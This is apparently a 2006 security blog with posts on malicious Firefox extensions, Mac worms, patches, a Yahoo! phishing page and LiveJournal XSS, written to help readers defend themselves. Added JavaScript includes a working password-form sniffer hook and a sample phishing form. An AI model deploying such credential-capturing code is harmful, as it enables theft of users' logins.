3 Mar

Using WordPress 2.0.1

This is the first entry that is posted using WordPress 2.0. The most obvious changes are in the user interface – sleek, still in the shades of blue, and most formatting commands are now displayed in icons, replacing those text buttons.

Another obvious new feature is the import capability: you can now import entries from Blogger, LiveJournal, and more.

3 Mar

Malicious Firefox Extensions?

A recent BugTraq post describes an attack vector that deserves more attention: a malicious Firefox extension.

Firefox is gaining popularity as an alternative to the bug- and malware-prone Internet Explorer. It offers tabbed browsing and is customizable through themes and extensions. The catch is that extensions are executable code: they run inside the browser with the browser's own privileges and can see every page and every form the user fills in. So an attacker only has to write an innocuous-looking extension and entice users to download and install it. Voila!

As a proof of concept, the poster wrote an HTML form sniffer extension. To quote:

FFsniFF is a simple Firefox extension, which transforms your browser into an HTML form sniffer. Every time the user clicks the ‘Submit’ button, FFsniFF will try to find a non-blank password field in the form. If it’s found, the entire form (along with the URL) is sent to the specified e-mail address.

Scary? Not really. The mitigation is simple: only download and install extensions from the official Firefox themes and extensions site, and treat an extension offered through a link in e-mail or instant messaging as untrusted, however useful it claims to be. Once an extension is installed, no amount of care on the pages you visit will keep a password away from it.
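The sniffer the quoted description outlines, as an added example that is neither FFsniFF's code nor the original post's: the trigger ("is there a non-blank password field?") and the serialisation are pure functions over {name, type, value} field objects, the shape that HTMLFormElement.elements yields, so the logic runs under Node against the constructed sign-in form at the bottom as well as inside a browser. The sample form, its field names and the submit hook are assumptions for illustration; the e-mail step is replaced by a console.log.

```javascript
// Added example (not FFsniFF's code or the original post's): the core of a
// form-sniffing extension as pure functions, so the logic runs under Node
// against the constructed form below as well as inside a browser.
// Fields only need {name, type, value[, checked]}, which is what
// HTMLFormElement.elements yields.

// FFsniFF's trigger: is there at least one non-blank password field?
function hasFilledPassword(fields) {
  return fields.some(f => f.type === 'password' &&
                          typeof f.value === 'string' && f.value.trim() !== '');
}

// Serialise the submission (page URL plus every field the browser would
// actually send). Returns null when the trigger is not met, so searches and
// comment boxes are ignored and only credentials leave the browser.
function captureSubmission(pageUrl, fields) {
  if (!hasFilledPassword(fields)) return null;
  const record = { url: pageUrl, fields: {} };
  for (const f of fields) {
    if (!f.name) continue;                                  // unnamed controls are never submitted
    if (f.type === 'submit' || f.type === 'button') continue;
    if ((f.type === 'checkbox' || f.type === 'radio') && f.checked === false) continue;
    record.fields[f.name] = f.value;
  }
  return record;
}

// The hook a real extension installs: a capturing listener on the document
// fires before the page's own submit handlers, on every site the user
// visits. FFsniFF e-mails the record; here it is only logged. Guarded so
// the file also runs under Node.
if (typeof document !== 'undefined') {
  document.addEventListener('submit', ev => {
    const rec = captureSubmission(location.href, Array.from(ev.target.elements));
    if (rec) console.log(JSON.stringify(rec));
  }, true);
}

// Constructed sample input standing in for a sign-in form.
const SAMPLE_LOGIN_FORM = [
  { name: 'login',    type: 'text',     value: 'alice' },
  { name: 'passwd',   type: 'password', value: 'hunter2' },
  { name: 'remember', type: 'checkbox', value: 'on', checked: true },
  { name: '',         type: 'submit',   value: 'Sign In' },
];
```

Note that nothing on the web page can defend against this: the listener is registered in the capturing phase, so it sees the submission before any script on the site does, and it runs with the browser's privileges rather than the page's. That is why the only control is not installing the extension in the first place.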

18 Feb

Mac OSX Malware on the Loose

One of the myths of the Mac world is that it is impervious to malware. It was close to true: Mac OS had seldom been targeted by malware writers, so its record was clean. Too bad that clean record had to be broken.

This is already days old, but better late than never.

Two new worms targeting Mac OS X 10.4 have been discovered. OSX_LEAP.A spreads via iChat, where it sends a compressed archive. The archive contains two files, one of which carries a JPEG icon; this is a classic social engineering technique. The user has to extract the files and open one of them for the malware to execute.

The other one, OSX_INQTANA.A, spreads via Bluetooth. It is proof-of-concept malware written in Java that exploits a vulnerability described here.

With Apple's transition from PowerPC to Intel processors, analysts predict that more attacks will target the Mac and that security researchers will give it more attention.

AV watchers will have noticed that the vendors use nearly the same names for the two pieces of Mac malware.

Symantec descriptions:
*OSX.Leap.A
*OSX.Inqtana.A

Sophos descriptions:
*OSX/Inqtana-A
*OSX/Leap-A

15 Feb

New Microsoft Patches Released

Microsoft has released seven security bulletins for February 2006. Two of them are rated Critical and the rest are rated Important.

The two Critical bulletins both allow remote code execution:

*MS06-004 is another vulnerability in Windows Metafile (WMF) image handling, the subject of a security bulletin last month.
*MS06-005 is a vulnerability in Windows Media Player.

The five Important bulletins:

*MS06-006 is another Windows Media Player vulnerability, this time in the WMP plugin for non-Internet Explorer browsers; it also allows remote code execution.
*MS06-007 describes a denial of service caused by the way Windows handles specially-crafted IGMP packets.
*MS06-008 is a vulnerability in the Windows Web Client service that could let an attacker take complete control of the target system.
*MS06-009 describes a vulnerability in the Windows and Office Korean Input Method Editor that could allow elevation of privilege.
*MS06-010 discusses how PowerPoint 2000 can disclose information to an attacker.

A summary of these vulnerabilities can be found here. If you use Microsoft products affected by these advisories, update them: turn on Automatic Updates, or visit the links above to download the patches. Note that working exploits already exist for some of these vulnerabilities, so it is only a matter of time before malware authors use them. The good news is that none of them is being exploited by malware ahead of the patch, unlike the WMF brouhaha last month.

31 Jan

Grew/Nyxem/Blackmal Worm File Deletion on Feb. 3

Antivirus companies are warning users about the destructive payload of the Grew/Nyxem/Blackmal worm. On February 3, 2006, and on the 3rd of every month thereafter, 30 minutes after the computer has been started, it overwrites common document files (.DOC, .XLS, .PPT, .ZIP and others) with the string “DATA Error [47 0F 94 93 F4 K5]”, destroying their contents.

It also disables the mouse and keyboard, deletes files and registry entries belonging to antivirus products, and closes AV windows so that users cannot run them.

Trend Micro’s description for this worm is here.

Best bet: update your AV product, then perform a full scan of all your hard drives. Back up your important or sensitive documents before the 3rd, and keep the backup on media that is disconnected from the machine, so that an infection you missed cannot overwrite the copy as well.

27 Jan

Yet Another Yahoo! Phishing Attempt

Thanks to Rocky for pointing out another desperate attempt to steal Yahoo! login credentials. The link is sent via Yahoo! Messenger. Here’s what the page looks like:


[Screenshot: the fake Yahoo! sign-in page, with Geocities ads on the right]

Take note of the URL and the usual Yahoo! Geocities ads at the right.

When a user enters his credentials and clicks Sign In, the trouble begins. The user is directed to another page of the same kind, only with different pictures.


[Screenshot: the second fake sign-in page, served from the same URL]

Same link, different page. When you try logging in again, you are directed to a login error page.


[Screenshot: the fake login error page]

So what happens to the data entered? When you click Sign In the first time, Internet Explorer’s status bar displays this:


[Screenshot: Internet Explorer’s status bar showing the form being submitted to a CGI script]

It is sent to a CGI script! Uh oh. The URL of the CGI script is not obvious when you view the HTML source, because the link was written as hexadecimal character references (&#x..; escapes): the browser decodes them transparently, but a casual read of the source shows only a wall of escapes. We can suppose that the CGI script is a mailing script that sends the stolen credentials to an e-mail address, which is itself embedded in the HTML form in a hidden INPUT tag. In this image, I highlighted the relevant info that led me to that supposition.

[Screenshot: the HTML source of the phishing form, with the ACTION attribute and the hidden INPUT tags highlighted]

In the form tag, there is an ACTION attribute set to a long series of hexadecimal character references; decoded, it is the link you saw in the status bar image. There are four INPUT tags of type HIDDEN, which means these form fields are not visible to the user but are still submitted along with the credentials. Take note of the one whose value is set to a certain e-mail address.
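An added example, not the phishing page's own code or the original post's, of reading such a form the way the analysis above does: decode the hexadecimal character references in every attribute, then list the real ACTION and the hidden inputs. SAMPLE_HTML is constructed to have the shape described (an encoded ACTION, four hidden inputs, one of them an e-mail address); the host, the script path and the address are placeholders, and the hidden-field names follow the FormMail convention (recipient, subject, redirect, required) as an assumption about what a mailing script expects, not as anything taken from the real page.

```javascript
// Added example (not the phishing page's code or the original post's):
// decode attributes obfuscated with numeric character references and list
// where a form really posts. SAMPLE_HTML is constructed to resemble the
// page described; host, script path, address and hidden-field names
// (FormMail-style recipient/subject/redirect/required) are placeholders.

// Decode &#xHH; and &#DDD; references, the "HTML hexadecimal notation" of
// the post. Named entities (&amp; etc.) are deliberately left untouched.
function decodeNumericRefs(s) {
  return s.replace(/&#(x[0-9a-f]+|\d+);?/gi, (_, num) => {
    const code = /^x/i.test(num) ? parseInt(num.slice(1), 16) : parseInt(num, 10);
    return String.fromCodePoint(code);
  });
}

// Read one attribute off a tag, decoding its value. Handles double-quoted,
// single-quoted and bare values; returns null when the attribute is absent.
function attrOf(tag, name) {
  const re = new RegExp('\\b' + name + '\\s*=\\s*(?:"([^"]*)"|\'([^\']*)\'|([^\\s>]+))', 'i');
  const m = re.exec(tag);
  if (!m) return null;
  const raw = m[1] !== undefined ? m[1] : (m[2] !== undefined ? m[2] : m[3]);
  return decodeNumericRefs(raw);
}

// Summarise the first <form>: decoded ACTION plus hidden and visible inputs.
function inspectForm(html) {
  const form = /<form\b([^>]*)>([\s\S]*?)<\/form>/i.exec(html);
  if (!form) return null;
  const inputs = [];
  const inputRe = /<input\b[^>]*>/gi;
  let m;
  while ((m = inputRe.exec(form[2])) !== null) {
    inputs.push({
      type: (attrOf(m[0], 'type') || 'text').toLowerCase(),
      name: attrOf(m[0], 'name'),
      value: attrOf(m[0], 'value'),
    });
  }
  return {
    method: (attrOf(form[1], 'method') || 'get').toUpperCase(),
    action: attrOf(form[1], 'action'),
    hidden: inputs.filter(i => i.type === 'hidden'),
    visible: inputs.filter(i => i.type !== 'hidden'),
  };
}

// How the phisher obfuscated the page: every character as a hex reference.
const obfuscate = s => Array.from(s, c => '&#x' + c.codePointAt(0).toString(16) + ';').join('');

// Constructed sample, shaped like the page in the screenshots.
const SAMPLE_HTML = `
<form method="post" action="${obfuscate('http://phish.example/cgi-bin/formmail.cgi')}">
  <input type="hidden" name="recipient" value="${obfuscate('drop@phish.example')}">
  <input type="hidden" name="subject" value="yahoo login">
  <input type="hidden" name="redirect" value="${obfuscate('http://phish.example/second.html')}">
  <input type="hidden" name="required" value="login,passwd">
  <input type="text" name="login">
  <input type="password" name="passwd">
  <input type="submit" value="Sign In">
</form>`;

if (typeof require !== 'undefined' && require.main === module) {
  console.log(JSON.stringify(inspectForm(SAMPLE_HTML), null, 2));
}
```

The decoded redirect field is also worth reading: a mailing script that bounces the victim to a second page after posting is exactly what produces the "same link, different page" behaviour seen above.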

The link was spread via Yahoo! Messenger. Maybe it was social engineering, one user enticing another into forwarding the link; maybe it was malware capable of sending messages through YM. Checking the browser’s address bar is no guarantee either: there are well-made phishing sites that overlay a window so that the true URL is hidden.

Good thing Yahoo! Geocities is ad-supported: the ads are a giveaway, since Yahoo! would never host its real sign-in page on a free Geocities account.

Be careful, again.

21 Jan

LiveJournal Accounts Hijacked Due to XSS Holes

In a blog post, a group of hackers known as “Bantown” claims to have hijacked “900,000 LJ accounts” to demonstrate that LiveJournal (LJ) is susceptible to cross-site scripting (XSS): JavaScript injected into journal content runs in other users’ browsers. As an LJ user, this is troubling. While LJ claims that these holes were plugged, Bantown claims there are several holes still unplugged.

One of LJ’s fixes is to serve journals from a new per-user subdomain. The point is origin isolation: script injected into a journal then runs on that user’s subdomain rather than on the main site where the login session lives, so it can no longer read the session cookie or act as the victim on the main site. That only holds if the session cookie is scoped to the main host rather than to the whole livejournal.com domain.

LJ users: either keep a backup blog (try Blogspot or WordPress.com) or back up your entries. As for how to back up your entries: frankly, the only way I know is copy and paste. Also, Multiply has a feature that lets you import your LJ blog into your Multiply blog (if you have an account).

The blog entry is here. Said link is also quoted at the LJ Infosec community.
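Why a per-user subdomain helps, and where it stops helping, as an added example that is neither LJ's nor Bantown's code. Host names, paths and the cookie name are illustrative assumptions. The first function is the same-origin test browsers apply before letting one page's script read another's DOM or document.cookie; the second is the RFC 6265 domain-matching rule that decides which cookies a page on a given host can see; the third combines them for a journal page carrying injected script.

```javascript
// Added example (not LiveJournal's or Bantown's code): origin isolation
// via a per-user subdomain, and the cookie-scoping condition it depends on.
// All host names, paths and cookie names are illustrative.

// Same-origin policy: scheme, host and port must all match before script
// on one page may read another page's DOM or its document.cookie.
function sameOrigin(urlA, urlB) {
  const a = new URL(urlA), b = new URL(urlB);
  return a.protocol === b.protocol && a.hostname === b.hostname && a.port === b.port;
}

// RFC 6265 domain matching. A cookie set without a Domain attribute is a
// host-only cookie: it goes back only to the exact host that set it. A
// cookie with Domain=livejournal.com goes to that host and every subdomain.
function cookieSentTo(cookie, requestHost) {
  const host = requestHost.toLowerCase();
  if (!cookie.domain) return host === cookie.setBy.toLowerCase();
  const d = cookie.domain.toLowerCase().replace(/^\./, '');
  return host === d || host.endsWith('.' + d);
}

// What script injected into a journal page can reach: the login origin
// itself (full account takeover via XHR/DOM) and/or the session cookie
// (readable through document.cookie, then replayable from anywhere).
function xssExposure(sessionCookie, journalUrl, loginUrl) {
  const journalHost = new URL(journalUrl).hostname;
  return {
    sameOriginAsLogin: sameOrigin(journalUrl, loginUrl),
    sessionCookieReadable: cookieSentTo(sessionCookie, journalHost),
  };
}

// Two ways the site could have issued its session cookie (assumed).
const HOST_ONLY_SESSION   = { name: 'ljsession', setBy: 'www.livejournal.com' };
const DOMAIN_WIDE_SESSION = { name: 'ljsession', setBy: 'www.livejournal.com', domain: '.livejournal.com' };

const LOGIN_URL       = 'http://www.livejournal.com/login.bml';
const OLD_JOURNAL_URL = 'http://www.livejournal.com/users/attacker/';   // journals on the main host
const NEW_JOURNAL_URL = 'http://attacker.livejournal.com/';             // journals on a per-user subdomain

if (typeof require !== 'undefined' && require.main === module) {
  console.log('old layout            ', xssExposure(HOST_ONLY_SESSION, OLD_JOURNAL_URL, LOGIN_URL));
  console.log('subdomain, host cookie', xssExposure(HOST_ONLY_SESSION, NEW_JOURNAL_URL, LOGIN_URL));
  console.log('subdomain, wide cookie', xssExposure(DOMAIN_WIDE_SESSION, NEW_JOURNAL_URL, LOGIN_URL));
}
```

The third case is the caveat: if the session cookie is issued for the whole livejournal.com domain, script on a user subdomain still reads it through document.cookie and the move buys nothing against session theft. The cookie has to be host-only on the main site for the subdomain split to do its job.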

11 Jan

A New Cellphone – Dead After A Year

What would you do if you find yourself having bought a new cellphone that was the first and the last in line?

Introducing the Nokia 7710:
Continue reading